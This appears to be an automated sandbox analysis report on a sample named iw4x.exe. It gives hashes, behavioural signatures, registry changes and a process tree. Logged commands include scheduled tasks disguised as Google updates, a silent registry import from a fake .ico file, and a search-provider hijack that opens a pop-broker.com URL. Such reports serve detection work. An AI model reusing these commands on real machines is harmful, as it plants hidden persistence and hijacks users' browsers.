Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
15-06-2024 17:52
Static task
static1
Behavioral task
behavioral1
Sample
iw4x.exe
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
iw4x.exe
Resource
win10v2004-20240611-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240508-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20240611-en
Behavioral task
behavioral5
Sample
$TEMP/tidy.bat
Resource
win7-20240508-en
Behavioral task
behavioral6
Sample
$TEMP/tidy.bat
Resource
win10v2004-20240611-en
Behavioral task
behavioral7
Sample
$_4_/iw4x.exe
Resource
win7-20240611-en
Behavioral task
behavioral8
Sample
$_4_/iw4x.exe
Resource
win10v2004-20240508-en
General
-
Target
iw4x.exe
-
Size
2.0MB
-
MD5
c56b3749e634f947687fbc2431d7dacc
-
SHA1
2bb5934ae11cd6033adadd23844eb179762dc2f5
-
SHA256
1d2c6dc364d6e2cfb42c03d8731119499a8914c28c41e83db9de568ed35c1787
-
SHA512
32b8ca3c9a4b277a9656d071d7f750e961ea39c9349bb45e80ecf55f3ae0c01393edeee9b77f44184e7c83a87e8cca3dbf1060c2c0164fc98a7d8be5f4f2d2ce
-
SSDEEP
49152:s8Wh7ey2CXEkqykl1EEXz8knkYcFDZX5TkMMKCAQMx0LioYbLQNP:sVhsCU/lGEXzZcFtJTpM3AdwioYk
Malware Config
Signatures
-
Deletes itself 1 IoCs
pid Process 2604 iw4x_patch-run.exe -
Executes dropped EXE 2 IoCs
pid Process 2604 iw4x_patch-run.exe 2564 iw4x.exe -
Loads dropped DLL 4 IoCs
pid Process 2080 iw4x.exe 2604 iw4x_patch-run.exe 2604 iw4x_patch-run.exe 2604 iw4x_patch-run.exe -
pid Process 3284 powershell.exe 3356 powershell.exe 3536 powershell.exe 3780 powershell.exe 2520 powershell.exe 3916 powershell.exe 960 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3508 schtasks.exe 4060 schtasks.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{352F0919-2B40-11EF-8A5C-CE787CD1CA6F} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com\Total = "340" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "21" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.google.com\ = "60" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "99" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DOMStorage IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com\Total = "21" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com\NumberOfSubdomains = "1" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "60" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000008a291bacf3fa0240a41d46565cf978d400000000020000000000106600000001000020000000ee15b15c076574705bc7e3cf585fc615e983a7fe1e43ce97451b11e7f7457c84000000000e80000000020000200000001c160d50c2892209be860574588c51073d325669e3b5ecf95293e0379475e7eb20000000a3f9cf5fa48abdb0872d852fd13a182225deb265eda5289109e92a68a11368ff40000000715c12473ddecde5d7242c41f0e4a0fcfa76ac8251f7d185cd6612c11ab1653e97918b7b557eb633482c0b0854015172881a603aea83086dc888f88ed7a752da iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000008a291bacf3fa0240a41d46565cf978d4000000000200000000001066000000010000200000004d6de3dd46bcdb35c22613447c044ff8a590ec7a89128e841cb50a36b29e7251000000000e80000000020000200000001b87f0e9e7e5dbf71c588127589cccc43199a18ba2401679ab349ff1061ff8459000000020ecd9101d3756db968e4785553fdf989187666c5147f88e88ed52a0a89966d1c62beba199c26cfcca336e475d2744efc630cd66cd13a7f1e239d732f5ce18eee9199c8945ac3cb2bd21c5221d2a2afeddd1823249fb09055298d74f54323cc7ebbf1b71963ab69b6dd853031f104ecb8efe478fa7e0238db0c30749dd23ea3c5670d53fc964cb9b4b4f6c451726119040000000de1d61e172c9a092997deae2e207030e105730a1eb5b2029393b5af821e11eb06c14fc9d7487617c30c142ac9ee16d6f7b479b24420a4c45a235a758d58ee651 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com\Total = "60" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b05ae30a4dbfda01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "340" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com\Total = "99" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.google.com IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.google.com\ = "340" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.google.com\ = "21" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.google.com\ = "99" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_Classes\Local Settings firefox.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 960 powershell.exe 3284 powershell.exe 3356 powershell.exe 3536 powershell.exe 3780 powershell.exe 2520 powershell.exe 3916 powershell.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 2128 firefox.exe Token: SeDebugPrivilege 2128 firefox.exe Token: SeDebugPrivilege 960 powershell.exe Token: SeDebugPrivilege 3284 powershell.exe Token: SeDebugPrivilege 3356 powershell.exe Token: SeDebugPrivilege 3536 powershell.exe Token: SeDebugPrivilege 3780 powershell.exe Token: SeDebugPrivilege 2520 powershell.exe Token: SeDebugPrivilege 3916 powershell.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 2128 firefox.exe 2128 firefox.exe 2128 firefox.exe 2128 firefox.exe 2956 iexplore.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2128 firefox.exe 2128 firefox.exe 2128 firefox.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2956 iexplore.exe 2956 iexplore.exe 1848 IEXPLORE.EXE 1848 IEXPLORE.EXE 1848 IEXPLORE.EXE 1848 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2080 wrote to memory of 2604 2080 iw4x.exe 28 PID 2080 wrote to memory of 2604 2080 iw4x.exe 28 PID 2080 wrote to memory of 2604 2080 iw4x.exe 28 PID 2080 wrote to memory of 2604 2080 iw4x.exe 28 PID 2080 wrote to memory of 2604 2080 iw4x.exe 28 PID 2080 wrote to memory of 2604 2080 iw4x.exe 28 PID 2080 wrote to memory of 2604 2080 iw4x.exe 28 PID 2604 wrote to memory of 2564 2604 iw4x_patch-run.exe 29 PID 2604 wrote to memory of 2564 2604 iw4x_patch-run.exe 29 PID 2604 wrote to memory of 2564 2604 iw4x_patch-run.exe 29 PID 2604 wrote to memory of 2564 2604 iw4x_patch-run.exe 29 PID 2684 wrote to memory of 2128 2684 firefox.exe 32 PID 2684 wrote to memory of 2128 2684 firefox.exe 32 PID 2684 wrote to memory of 2128 2684 firefox.exe 32 PID 2684 wrote to memory of 2128 2684 firefox.exe 32 PID 2684 wrote to memory of 2128 2684 firefox.exe 32 PID 2684 wrote to memory of 2128 2684 firefox.exe 32 PID 2684 wrote to memory of 2128 2684 firefox.exe 32 PID 2684 wrote to memory of 2128 2684 firefox.exe 32 PID 2684 wrote to memory of 2128 2684 firefox.exe 32 PID 2684 wrote to memory of 2128 2684 firefox.exe 32 PID 2684 wrote to memory of 2128 2684 firefox.exe 32 PID 2684 wrote to memory of 2128 2684 firefox.exe 32 PID 2128 wrote to memory of 2836 2128 firefox.exe 33 PID 2128 wrote to memory of 2836 2128 firefox.exe 33 PID 2128 wrote to memory of 2836 2128 firefox.exe 33 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 PID 2128 wrote to memory of 1680 2128 firefox.exe 34 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\iw4x.exe"C:\Users\Admin\AppData\Local\Temp\iw4x.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Users\Admin\AppData\Local\Temp\iw4x_patch-run.exe"C:\Users\Admin\AppData\Local\Temp\iw4x_patch-run.exe" C:\Users\Admin\AppData\Local\Temp2⤵
- Deletes itself
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Users\Admin\AppData\Local\Temp\iw4x.exe"C:\Users\Admin\AppData\Local\Temp\iw4x.exe"3⤵
- Executes dropped EXE
PID:2564
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tidy.bat" "C:\Users\Admin\AppData\Local\Temp\iw4x_patch-run.exe" "DefaultSearchProvider" "HKEY_LOCAL_MACHINE\SOFTWARE\\" "GPR" "CJ_2024-06" "x4w-3,99" "Windows Registry Editor" "{5B3B2B2B-48B1-437E-B4F0-2D1589ECE755}""3⤵PID:3848
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.pop-broker.com/?FORM=nwlcjstart&subid=GPR&bucket=x4w-3,99&q=&cid={5B3B2B2B-48B1-437E-B4F0-2D1589ECE755}4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2956 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2956 CREDAT:275457 /prefetch:25⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1848
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "[cultureinfo]::CurrentCulture.DateTimeFormat.ShortDatePattern; (Get-Date).AddDays(10).ToString([cultureinfo]::CurrentCulture.DateTimeFormat.ShortDatePattern)"4⤵PID:3920
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "[cultureinfo]::CurrentCulture.DateTimeFormat.ShortDatePattern; (Get-Date).AddDays(10).ToString([cultureinfo]::CurrentCulture.DateTimeFormat.ShortDatePattern)"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "$input = ''; $cleaned = $input -replace '[a-zA-Z0-9]', ''; if ($cleaned.Length -gt 0) { $cleaned[0] } else { '.' }"4⤵PID:3260
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$input = ''; $cleaned = $input -replace '[a-zA-Z0-9]', ''; if ($cleaned.Length -gt 0) { $cleaned[0] } else { '.' }"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3284
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "$s = ''.Split('.'); $res = $s | ForEach-Object { if ($_.Length -lt 2) { '0' + $_ } else { $_ } }; $res -join '.'"4⤵PID:3512
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$s = ''.Split('.'); $res = $s | ForEach-Object { if ($_.Length -lt 2) { '0' + $_ } else { $_ } }; $res -join '.'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3356
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "GoogleUpdateWeekly" /sc daily /sd 0 /st 00:00 /ri 60 /du 24:00 /rl highest /f /tr "regedit.exe /s \"C:\Users\Admin\AppData\Local\Temp\temp_cleanup.ico\" "4⤵
- Creates scheduled task(s)
PID:3508
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "[cultureinfo]::CurrentCulture.DateTimeFormat.ShortDatePattern; (Get-Date).AddDays(29).ToString([cultureinfo]::CurrentCulture.DateTimeFormat.ShortDatePattern)"4⤵PID:3096
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "[cultureinfo]::CurrentCulture.DateTimeFormat.ShortDatePattern; (Get-Date).AddDays(29).ToString([cultureinfo]::CurrentCulture.DateTimeFormat.ShortDatePattern)"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3536
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "$input = ''; $cleaned = $input -replace '[a-zA-Z0-9]', ''; if ($cleaned.Length -gt 0) { $cleaned[0] } else { '.' }"4⤵PID:3760
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$input = ''; $cleaned = $input -replace '[a-zA-Z0-9]', ''; if ($cleaned.Length -gt 0) { $cleaned[0] } else { '.' }"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3780
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "$s = ''.Split('.'); $res = $s | ForEach-Object { if ($_.Length -lt 2) { '0' + $_ } else { $_ } }; $res -join '.'"4⤵PID:2904
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$s = ''.Split('.'); $res = $s | ForEach-Object { if ($_.Length -lt 2) { '0' + $_ } else { $_ } }; $res -join '.'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2520
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "GoogleUpdateDaily" /sc daily /mo 1 /sd 0 /st 00:00 /ri 360 /du 24:00 /rl highest /f /tr "cmd /c start "https://www.pop-broker.com/?FORM=nwlcjpop^&subid=GPR^&bucket=CJ_2024-06^&q=x4w-3,99^&cid={5B3B2B2B-48B1-437E-B4F0-2D1589ECE755}" "4⤵
- Creates scheduled task(s)
PID:4060
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(Get-Content -Path 'C:\Users\Admin\AppData\Local\Temp\temp_cleanup.ico').Replace('{HKS}', '"HKEY_LOCAL_MACHINE\SOFTWARE\\"').Replace('{DSP}', '"DefaultSearchProvider"').Replace('{subid}', '"GPR"').Replace('{bucket}', '"CJ_2024-06"').Replace('{WRE}', '"Windows Registry Editor"').Replace('{hash}', '"{5B3B2B2B-48B1-437E-B4F0-2D1589ECE755}"') | Set-Content -Path 'C:\Users\Admin\AppData\Local\Temp\temp_cleanup.ico'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3916
-
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.0.642182112\1334906013" -parentBuildID 20221007134813 -prefsHandle 1280 -prefMapHandle 1272 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c09e2008-1c10-4484-b49c-fae2907cbfdd} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 1344 114d2e58 gpu3⤵PID:2836
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.1.385744279\331674441" -parentBuildID 20221007134813 -prefsHandle 1520 -prefMapHandle 1516 -prefsLen 20830 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e85534d-064e-4933-93a7-80748d5a26ee} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 1532 e70d58 socket3⤵PID:1680
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.2.433452079\76880681" -childID 1 -isForBrowser -prefsHandle 2000 -prefMapHandle 2164 -prefsLen 20868 -prefMapSize 233444 -jsInitHandle 872 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bae785fc-093b-4671-8137-1bd543124271} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 2104 19fbb358 tab3⤵PID:2708
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.3.1442187008\1858519373" -childID 2 -isForBrowser -prefsHandle 2368 -prefMapHandle 2040 -prefsLen 26111 -prefMapSize 233444 -jsInitHandle 872 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2c152dc3-73b2-4227-9c7a-9486f3df5ce7} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 1712 e63558 tab3⤵PID:1848
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.4.1299011050\2118446854" -childID 3 -isForBrowser -prefsHandle 2876 -prefMapHandle 2368 -prefsLen 26111 -prefMapSize 233444 -jsInitHandle 872 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7bf76cbe-10f8-4dd8-b980-ddb1d2f91a94} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 2888 1c32b858 tab3⤵PID:384
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.5.1010152204\1559293287" -childID 4 -isForBrowser -prefsHandle 3768 -prefMapHandle 3788 -prefsLen 26170 -prefMapSize 233444 -jsInitHandle 872 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fc99154b-054d-4a26-898a-4948af42c838} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 3808 1f32b558 tab3⤵PID:2968
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.6.1577746333\777582129" -childID 5 -isForBrowser -prefsHandle 3916 -prefMapHandle 3920 -prefsLen 26170 -prefMapSize 233444 -jsInitHandle 872 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bcb027a7-4107-463e-be4a-3fbb999bd13a} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 3904 1f4b6b58 tab3⤵PID:2508
-
-
